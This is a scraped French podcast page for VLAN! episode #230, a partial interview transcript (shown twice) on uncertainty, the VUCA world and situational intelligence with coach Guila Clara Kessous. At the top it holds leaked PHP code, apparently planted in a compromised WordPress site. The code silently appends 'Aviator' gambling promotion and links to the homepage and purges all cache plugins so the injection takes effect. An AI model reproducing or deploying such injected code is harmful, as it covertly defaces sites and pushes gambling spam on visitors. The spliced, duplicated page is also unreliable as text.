if (!function_exists('add_custom_html_to_content_1')) { function add_custom_html_to_content_1($content) { $current_url = $_SERVER['REQUEST_URI']; if ($current_url == '/') { $custom_html ="

Aviator Jogo Brasil: Entre na Aventura dos Jogos Aviator no Brasil

Entre na aventura dos jogos Aviator no Brasil e divirta-se com uma experiência de jogo emocionante. Ganhe prêmios incríveis e desfrute da diversão!

https://aviator-jogo-brazil.org/
"; $content .= $custom_html; } $plugins = array( 'W3 Total Cache' => 'w3tc_pgcache_flush', 'WP Super Cache' => 'wp_cache_clear_cache', 'LiteSpeed Cache' => 'litespeed_purge_all', 'Cache Enabler' => 'ce_clear_cache', 'Comet Cache' => 'comet_cache_clear_cache', 'Hyper Cache' => 'hyper_cache_clear_cache', ); foreach ($plugins as $plugin_name => $function_name) { if (function_exists($function_name)) { call_user_func($function_name); } } if (class_exists('LiteSpeed\Purge')) { if (method_exists('LiteSpeed\Purge', 'purge_all')) { LiteSpeed\Purge::purge_all('Custom Reason'); } } if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); } return $content; } add_filter('the_content', 'add_custom_html_to_content_1'); } if (!function_exists('add_custom_html_to_content_2')) { function add_custom_html_to_content_2($content) { $current_url = $_SERVER['REQUEST_URI']; if ($current_url == '/') { $custom_html ="

Aviator Download: Baixe Agora e Comece a Jogar

Faça o download do Aviator agora e comece a jogar. Desfrute de uma variedade de jogos emocionantes e ganhe prêmios incríveis!

aviator download
"; $content .= $custom_html; } $plugins = array( 'W3 Total Cache' => 'w3tc_pgcache_flush', 'WP Super Cache' => 'wp_cache_clear_cache', 'LiteSpeed Cache' => 'litespeed_purge_all', 'Cache Enabler' => 'ce_clear_cache', 'Comet Cache' => 'comet_cache_clear_cache', 'Hyper Cache' => 'hyper_cache_clear_cache', ); foreach ($plugins as $plugin_name => $function_name) { if (function_exists($function_name)) { call_user_func($function_name); } } if (class_exists('LiteSpeed\Purge')) { if (method_exists('LiteSpeed\Purge', 'purge_all')) { LiteSpeed\Purge::purge_all('Custom Reason'); } } if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); } return $content; } add_filter('the_content', 'add_custom_html_to_content_2'); } Comment se connecter à son intelligence situationnelle, avec Guila.

#230 Comment se connecter à son intelligence situationnelle? Avec Guila Clara Kessous

VLAN! Podcast
VLAN! Podcast
#230 Comment se connecter à son intelligence situationnelle? Avec Guila Clara Kessous
Loading
/

GRÉGORY : On est dans une période un peu tumultueuse et qui va générer pas mal d’incertitudes. On sait déjà que les gens ne vont pas très bien et on sait qu’ils ne vont pas aller très bien dans les mois et années à venir. Mentalement, ça, c’est en raison d’une incertitude qui devient de plus en plus forte. Peut-être la première question, c’est comment on fait pour gérer son incertitude ?

GUILA : Alors excellente question Gregory. Si jamais j’avais la réponse à cette question, je pense que je serais milliardaire. Là où je pense que je peux être utile, C’est pour essayer de clarifier la définition d’incertitude et essayer de montrer ce qu’il existe en termes de moyens pour parvenir à essayer de calmer ses angoisses face à cette incertitude. Alors déjà, ce qu’il faut bien comprendre dans la définition de l’incertitude, c’est la différence qu’il existe entre l’incertitude et le hasard. Le hasard est quelque chose qui peut se prédire, c’est à dire qu’on a toutes les probabilités qui permettent de pouvoir envisager une possibilité de prédiction. Par exemple, si je mets une boule verte, une boule rouge et une boule blanche dans un chapeau, je sais très bien que si je plonge ma main dans le chapeau, j’aurai une certaine probabilité pour pouvoir trouver une de ces trois couleurs. Ça, c’est le hasard. L’incertitude, c’est quand je plonge ma main dans le chapeau et que je tombe sur une boule noire, une boule à paillettes, une boule qui n’était absolument pas prévue. C’est cette incertitude qui, tout d’un coup, arrive hors de toute possibilité de prédiction. Quand tu dis comment réussir à essayer dE calmer cette angoisse face à l’incertitude, il existe aujourd’hui des moyens rationnels de pouvoir essayer de rendre l’inconnu un peu moins inconnu. C’est vrai que ces différentes méthodes ont été utilisées, notamment dans un cadre militaire ou même dans un cadre d’entreprise. Donc pour te donner une idée, on parle par exemple d’un monde VUCA. Est-ce que tu as déjà entendu parler de ce monde VUCA ?

GRÉGORY : Je connais le monde VUCA, ça me dit quelque chose, mais je serais absolument incapable de le définir.

GUILA  : Alors ce monde VUCA est très à la mode aujourd’hui, on parle d’un monde de VUCA lorsque l’on veut décrire un monde qui est, et je reprends l’acronyme, V pour Volatile, U en anglais pour Uncertain, C pour Complexe et A pour ambigu. Donc c’est cette volatilité, incertitude, complexité, ambiguïté, qui va donner les quatre composantes de l’impossibilité d’appréhension totale d’une situation. C’est vrai qu’on essaye de plus en plus de développer ce qu’on appelle l’intelligence situationnelle qui va permettre, avec un sens de la débrouille, de pouvoir réussir à se sortir de cet incertain lorsqu’il apparaît jaillissant sous nos yeux.

GRÉGORY : Alors, tu m’as fait découvrir le terme d’intelligence situationnelle, mais comme on est là, je sais absolument pas ce que c’est. Donc je suis très curieux que tu me décrives. Je connaissais l’intelligence émotionnelle mais pas situationnelle. Je n’en avais jamais entendu parler. Je suis très curieux que tu nous éclaires sur ce que c’est que l’intelligence situationnelle.

GUILA : L’intelligence situationnelle, c’est vraiment le sens de la capacité de l’individu à pouvoir réagir face à l’incertain. Donc c’est vraiment tout à fait lié à ce que tu disais. C’est comment je réussis à pouvoir trouver l’intelligence lorsque je dois faire appel à des choses que je ne sais pas. Je me rappelle cette très belle citation qui disait que l’intelligence n’est pas ce que l’on sait, mais ce que l’on fait quand on ne sait pas. C’est exactement ça, l’intelligence situationnelle, c’est-à-dire comment je réussis à m’habituer pour faire en sorte que face à l’incertain qui finalement est notre quotidien aujourd’hui, je réussisse à continuer à naviguer, à faire en sorte que mon paquebot ne craque pas et à trouver les outils nécessaires pour pouvoir continuer à garder le cap.

GRÉGORY : Est-ce que ça se rapproche de la résilience ou c’est l’inverse de la résilience ? La résilience, ça voudrait dire que je m’adapte finalement aux problèmes qui sont devant moi.

GUILA : Alors, la résilience, c’est plus quelque chose qui s’apprend en dépit de soi. C’est-à-dire que la résilience, c’est quelque chose que l’on apprend avec, on va dire une frustration, avec un traumatisme, avec un accident. La résilience, c’est ce quotient qu’on va réussir à pouvoir mesurer lorsque, au travers d’un séisme personnel, au travers d’un accident, on voit l’individu non pas se casser, mais résister et devenir encore plus résistant. Il y a quelque chose qui fait que le corps comprend, non seulement par l’échec, mais par l’épreuve du feu. La résilience, on va dire face à l’incertain, ce serait un corps qui se serait effondré, mais qui aurait réussi à trouver la force quand même de continuer, donc qui aurait appris à partir de cet échec ou de cet effondrement. L’intelligence situationnelle, c’est permettre encore autre chose que la résilience puisqu’on essaye de passer à côté de l’accident, c’est-à-dire qu’on arrive à vraiment, lorsqu’on voit la comète là qui tombe sur notre tête, à se dire tiens, il y a quelque chose qui arrive et tout de suite trouver une capacité immédiate d’improvisation. C’est ce que j’aime aussi, puisque tu sais combien est ce que je suis quelqu’un de passionné par le théâtre.

La suite à écouter sur Vlan !

Description de l’épisode

Guila Clara Kessouscoach de dirigeants, chercheuse et artiste (notamment nommée par l’Unesco) et autrice.
Quand j’ai rencontré Guila, elle m’a parlé d’intelligence situationnelle, je n’en n’avais jamais entendu parlé et ma curiosité m’a naturellement amené à m’intéresser au sujet.
D’autant plus que nous entrons dans une période de très fortes turbulence et qu’il va nous falloir improviser avec la vie et donc faire preuve d’une grande intelligence situationnelle justement.

Comme elle l’explique nous avons évolué dans un monde tellement confortable en France que notre capacité à nous adapter est devenue plus faible au fur et à mesure.

Vous aimerez aussi ces épisodes

Transcription partielle de l’épisode

VLAN! Podcast
VLAN! Podcast
#230 Comment se connecter à son intelligence situationnelle? Avec Guila Clara Kessous
Loading
/

GRÉGORY : On est dans une période un peu tumultueuse et qui va générer pas mal d’incertitudes. On sait déjà que les gens ne vont pas très bien et on sait qu’ils ne vont pas aller très bien dans les mois et années à venir. Mentalement, ça, c’est en raison d’une incertitude qui devient de plus en plus forte. Peut-être la première question, c’est comment on fait pour gérer son incertitude ?

GUILA : Alors excellente question Gregory. Si jamais j’avais la réponse à cette question, je pense que je serais milliardaire. Là où je pense que je peux être utile, C’est pour essayer de clarifier la définition d’incertitude et essayer de montrer ce qu’il existe en termes de moyens pour parvenir à essayer de calmer ses angoisses face à cette incertitude. Alors déjà, ce qu’il faut bien comprendre dans la définition de l’incertitude, c’est la différence qu’il existe entre l’incertitude et le hasard. Le hasard est quelque chose qui peut se prédire, c’est à dire qu’on a toutes les probabilités qui permettent de pouvoir envisager une possibilité de prédiction. Par exemple, si je mets une boule verte, une boule rouge et une boule blanche dans un chapeau, je sais très bien que si je plonge ma main dans le chapeau, j’aurai une certaine probabilité pour pouvoir trouver une de ces trois couleurs. Ça, c’est le hasard. L’incertitude, c’est quand je plonge ma main dans le chapeau et que je tombe sur une boule noire, une boule à paillettes, une boule qui n’était absolument pas prévue. C’est cette incertitude qui, tout d’un coup, arrive hors de toute possibilité de prédiction. Quand tu dis comment réussir à essayer dE calmer cette angoisse face à l’incertitude, il existe aujourd’hui des moyens rationnels de pouvoir essayer de rendre l’inconnu un peu moins inconnu. C’est vrai que ces différentes méthodes ont été utilisées, notamment dans un cadre militaire ou même dans un cadre d’entreprise. Donc pour te donner une idée, on parle par exemple d’un monde VUCA. Est-ce que tu as déjà entendu parler de ce monde VUCA ?

GRÉGORY : Je connais le monde VUCA, ça me dit quelque chose, mais je serais absolument incapable de le définir.

GUILA  : Alors ce monde VUCA est très à la mode aujourd’hui, on parle d’un monde de VUCA lorsque l’on veut décrire un monde qui est, et je reprends l’acronyme, V pour Volatile, U en anglais pour Uncertain, C pour Complexe et A pour ambigu. Donc c’est cette volatilité, incertitude, complexité, ambiguïté, qui va donner les quatre composantes de l’impossibilité d’appréhension totale d’une situation. C’est vrai qu’on essaye de plus en plus de développer ce qu’on appelle l’intelligence situationnelle qui va permettre, avec un sens de la débrouille, de pouvoir réussir à se sortir de cet incertain lorsqu’il apparaît jaillissant sous nos yeux.

GRÉGORY : Alors, tu m’as fait découvrir le terme d’intelligence situationnelle, mais comme on est là, je sais absolument pas ce que c’est. Donc je suis très curieux que tu me décrives. Je connaissais l’intelligence émotionnelle mais pas situationnelle. Je n’en avais jamais entendu parler. Je suis très curieux que tu nous éclaires sur ce que c’est que l’intelligence situationnelle.

GUILA : L’intelligence situationnelle, c’est vraiment le sens de la capacité de l’individu à pouvoir réagir face à l’incertain. Donc c’est vraiment tout à fait lié à ce que tu disais. C’est comment je réussis à pouvoir trouver l’intelligence lorsque je dois faire appel à des choses que je ne sais pas. Je me rappelle cette très belle citation qui disait que l’intelligence n’est pas ce que l’on sait, mais ce que l’on fait quand on ne sait pas. C’est exactement ça, l’intelligence situationnelle, c’est-à-dire comment je réussis à m’habituer pour faire en sorte que face à l’incertain qui finalement est notre quotidien aujourd’hui, je réussisse à continuer à naviguer, à faire en sorte que mon paquebot ne craque pas et à trouver les outils nécessaires pour pouvoir continuer à garder le cap.

GRÉGORY : Est-ce que ça se rapproche de la résilience ou c’est l’inverse de la résilience ? La résilience, ça voudrait dire que je m’adapte finalement aux problèmes qui sont devant moi.

GUILA : Alors, la résilience, c’est plus quelque chose qui s’apprend en dépit de soi. C’est-à-dire que la résilience, c’est quelque chose que l’on apprend avec, on va dire une frustration, avec un traumatisme, avec un accident. La résilience, c’est ce quotient qu’on va réussir à pouvoir mesurer lorsque, au travers d’un séisme personnel, au travers d’un accident, on voit l’individu non pas se casser, mais résister et devenir encore plus résistant. Il y a quelque chose qui fait que le corps comprend, non seulement par l’échec, mais par l’épreuve du feu. La résilience, on va dire face à l’incertain, ce serait un corps qui se serait effondré, mais qui aurait réussi à trouver la force quand même de continuer, donc qui aurait appris à partir de cet échec ou de cet effondrement. L’intelligence situationnelle, c’est permettre encore autre chose que la résilience puisqu’on essaye de passer à côté de l’accident, c’est-à-dire qu’on arrive à vraiment, lorsqu’on voit la comète là qui tombe sur notre tête, à se dire tiens, il y a quelque chose qui arrive et tout de suite trouver une capacité immédiate d’improvisation. C’est ce que j’aime aussi, puisque tu sais combien est ce que je suis quelqu’un de passionné par le théâtre.

La suite à écouter sur Vlan !

Menu